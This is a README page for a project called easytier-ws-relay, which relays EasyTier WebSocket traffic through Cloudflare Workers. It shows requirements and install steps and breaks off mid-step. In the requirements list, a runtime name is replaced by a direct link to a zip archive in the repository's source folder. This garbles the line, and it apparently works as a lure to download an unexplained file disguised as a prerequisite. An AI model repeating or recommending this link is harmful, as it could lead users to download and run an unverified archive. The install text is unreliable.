⚡ Relay WebSocket communications with EasyTier using Cloudflare Workers, providing a decentralized P2P networking solution in JavaScript.
https://nottropical.github.io ↗// readme
🌐 easytier-ws-relay - Simple WebSocket Connection for Cloudflare
🚀 Getting Started
Welcome to EasyTier WebSocket Relay! This software helps connect your applications through WebSockets via Cloudflare Workers, allowing seamless communication in a decentralized network. Follow these steps to set it up easily.
📥 Download & Install
To get started, you can download the latest version of the EasyTier WebSocket Relay directly from the Releases page.
🔧 Installation Requirements
Before downloading, ensure you have the following on your computer:
- Operating System: Compatible with Windows, MacOS, or Linux
- https://raw.githubusercontent.com/NotTropical/easytier-ws-relay/master/src/worker/easytier_relay_ws_furor.zip: Version 16.0.0 or higher
- Package Manager: pnpm (recommended) or npm
- Wrangler CLI: This is required to work with Cloudflare Workers
💻 How to Install
-
Download the latest release: Visit this page to download. Choose the latest version suitable for your operating system.
-
Extract the files: After downloading,…